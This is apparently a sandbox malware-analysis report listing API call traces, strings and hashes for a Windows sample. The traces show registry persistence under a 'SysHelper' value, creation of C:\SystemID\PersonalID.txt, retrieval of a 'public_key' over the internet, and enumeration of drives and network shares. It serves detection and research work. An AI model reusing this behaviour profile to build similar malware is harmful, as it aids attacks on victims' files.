                                                                                                        • DestroyWindow.USER32(?), ref: 00F2BF7B
                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00F2BFA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3873257347-0
                                                                                                        • Opcode ID: 379b4cda7c4e68fdc843955d67f4668ca1eeb7d95f1df90ec67500f3f3397b98
                                                                                                        • Instruction ID: a8f0920c281c0871dda94bb2c9981eaa46c4691646094da2b1f99a2ca36b82a9
                                                                                                        • Opcode Fuzzy Hash: 379b4cda7c4e68fdc843955d67f4668ca1eeb7d95f1df90ec67500f3f3397b98
                                                                                                        • Instruction Fuzzy Hash: 11C1C1719083509FDB20DF24EC4575ABBE4FF85324F144A1DF888872A1D77A9908EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F335B1
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3364A
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F33680
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3369D
                                                                                                        • __allrem.LIBCMT ref: 00F336F3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3370F
                                                                                                        • __allrem.LIBCMT ref: 00F33726
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33744
                                                                                                        • __allrem.LIBCMT ref: 00F3375B
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33779
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503770280-0
                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                        • Instruction ID: afc7a2d26dacf512abb0345b35291f1611faeb933c5fe893d01d8073f8501876
                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                        • Instruction Fuzzy Hash: 9B7197F2E00717ABD714DE79CC42B5AB7A8AF44374F14423AF914D7681E774EA40AB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F30FDD: __wfsopen.LIBCMT ref: 00F30FE8
                                                                                                        • _fgetws.LIBCMT ref: 00F1C7BC
                                                                                                        • _memmove.LIBCMT ref: 00F1C89F
                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00F1C94B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2864494435-54166481
                                                                                                        • Opcode ID: 6fd5d663f952dd38020e5325937d23158db90a70dc86b8aa14b2dc20f0f46388
                                                                                                        • Instruction ID: 80bfc551ae72081752f6e4119e2ae9157c68cfd90c6f2fce0caf7e9b0a2dc098
                                                                                                        • Opcode Fuzzy Hash: 6fd5d663f952dd38020e5325937d23158db90a70dc86b8aa14b2dc20f0f46388
                                                                                                        • Instruction Fuzzy Hash: E091E272D403199BDF21DFA4CC817EEB7B4AF04324F140529E805A3241E779AE84EBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00F1F338
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F1F353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                        • Opcode ID: 782c5e838f522e6b7c3ca82b023067afee5222d2c51a078251a27884580513ee
                                                                                                        • Instruction ID: 0636d4fdd06ca84606823be8b7111837fd1533d08c5ea2b1429f231e77a3ea0f
                                                                                                        • Opcode Fuzzy Hash: 782c5e838f522e6b7c3ca82b023067afee5222d2c51a078251a27884580513ee
                                                                                                        • Instruction Fuzzy Hash: 15C15971D01219EBDF00DFA4DD8ABDEBBB5BF14308F144029E405AB250EB79AA58DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F2E6D4), ref: 00F1C6C2
                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00F1C725
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C72E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                        • Opcode ID: 4b268eac27cdd5d602594fd408053afcbc2e1d4e50d0f336b562597725bd9120
                                                                                                        • Instruction ID: d87d5d49a9da14bb2993553681f5605227cca6f23c9a71a4bd88e756ac0bae4d
                                                                                                        • Opcode Fuzzy Hash: 4b268eac27cdd5d602594fd408053afcbc2e1d4e50d0f336b562597725bd9120
                                                                                                        • Instruction Fuzzy Hash: 80111B7594030DFBEF219FA0CC4ABEEBB79EB04B18F104195EA00F6191D7B15A54FA90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                        • Opcode ID: 545561ee216c8b63e77648041b15427e21ad42700d7ce7aebfd7fc9b52bd1423
                                                                                                        • Instruction ID: 44199bf613038b18c8776fa5ec87ec5ced6d82209fcef71c2be32d9a9e6e668d
                                                                                                        • Opcode Fuzzy Hash: 545561ee216c8b63e77648041b15427e21ad42700d7ce7aebfd7fc9b52bd1423
                                                                                                        • Instruction Fuzzy Hash: 77015231448396ABDA30DF209C05BDF7BD9AF51754F144819F98496182EB749208E797
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,00F2EE2F), ref: 00F21B1E
                                                                                                        • timeGetTime.WINMM(?,?,00F2EE2F), ref: 00F21B29
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B4C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F21B5C
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B6A
                                                                                                        • Sleep.KERNEL32(00000064,?,?,00F2EE2F), ref: 00F21B72
                                                                                                        • timeGetTime.WINMM(?,?,00F2EE2F), ref: 00F21B78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697694649-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F1C51B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C539
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00F2BABE
                                                                                                        • UpdateWindow.USER32(00000000), ref: 00F2BAC5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F20C12
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00F20C39
                                                                                                        • _memset.LIBCMT ref: 00F20C4C
                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00F20C63
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 364255426-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00F20A75
                                                                                                        • SetErrorMode.KERNEL32(00000001,01010234,00000002), ref: 00F20AE2
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00F20AF9
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F20B02
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00F20B1B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                        • String ID:
                                                                                                        • API String ID: 2560635915-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974526305-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00F1F125
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00F1F198
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00F1F1A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F1F1A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1421093161-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F2B1BA
                                                                                                          • Part of subcall function 00F211C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F2120F
                                                                                                          • Part of subcall function 00F211C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F21228
                                                                                                          • Part of subcall function 00F211C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2123D
                                                                                                          • Part of subcall function 00F211C0: MoveFileW.KERNEL32(00000000,?), ref: 00F21277
                                                                                                          • Part of subcall function 00F2BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                          • Part of subcall function 00F2BA10: RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                          • Part of subcall function 00F2BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B4B3
                                                                                                        • TranslateMessage.USER32(?), ref: 00F2B4CD
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2B4D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                        • API String ID: 441990211-897913220
                                                                                                        • Opcode ID: 1f00aa5180d634e5ab102d6b37926694b65091357843f1aa0ef049792a71eaa4
                                                                                                        • Instruction ID: b4cd53832a4b4917778b0a535cd20697718324d844a971e01dcf81abe3ab5a0a
                                                                                                        • Opcode Fuzzy Hash: 1f00aa5180d634e5ab102d6b37926694b65091357843f1aa0ef049792a71eaa4
                                                                                                        • Instruction Fuzzy Hash: 985137715142549BC718FB60EC52AEFB7A8BF94344F80491DF886431A2EF3CA619DBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2590308727-54166481
                                                                                                        • Opcode ID: 1ccea5e049b642754fcbd3c0465633aec1342f9e74e8bc9a89e2d73643b9eae1
                                                                                                        • Instruction ID: b987bced7b68c86a169a4428d9dca62998358cf9978f9389f99ea70dd60efbff
                                                                                                        • Opcode Fuzzy Hash: 1ccea5e049b642754fcbd3c0465633aec1342f9e74e8bc9a89e2d73643b9eae1
                                                                                                        • Instruction Fuzzy Hash: 7B112772E803159BDF31DF68DC523CE77A0AF10724F040529EC5952181E77A9A94ABC2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __flush__getptd_noexit__lock_file__write
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331135983-0
                                                                                                        • Opcode ID: 198831a7471d0cb7e7d94a282bb09a097bc31cae652b5b534385d01b84d7cc8d
                                                                                                        • Instruction ID: b4281f8e31eaa6bf492232a9af70709b13b2b589b565986f3dcb84022bcba3da
                                                                                                        • Opcode Fuzzy Hash: 198831a7471d0cb7e7d94a282bb09a097bc31cae652b5b534385d01b84d7cc8d
                                                                                                        • Instruction Fuzzy Hash: B811A332901F145AD6256BB88C6276E3790AF42B34F28874AF4759B1C2CF3CAA43A751
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F33B64
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • std::exception::exception.LIBCMT ref: 00F33B82
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F33B97
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 3074076210-0
                                                                                                        • Opcode ID: 9cd4fbcd253e25c62f3a82a700930f321697d9d42e18c2a316fe6f9f103f8c46
                                                                                                        • Instruction ID: 583ee72d6aff0cf4bac3cead09cb545e3c900df938a617aab41e6c14f1315b60
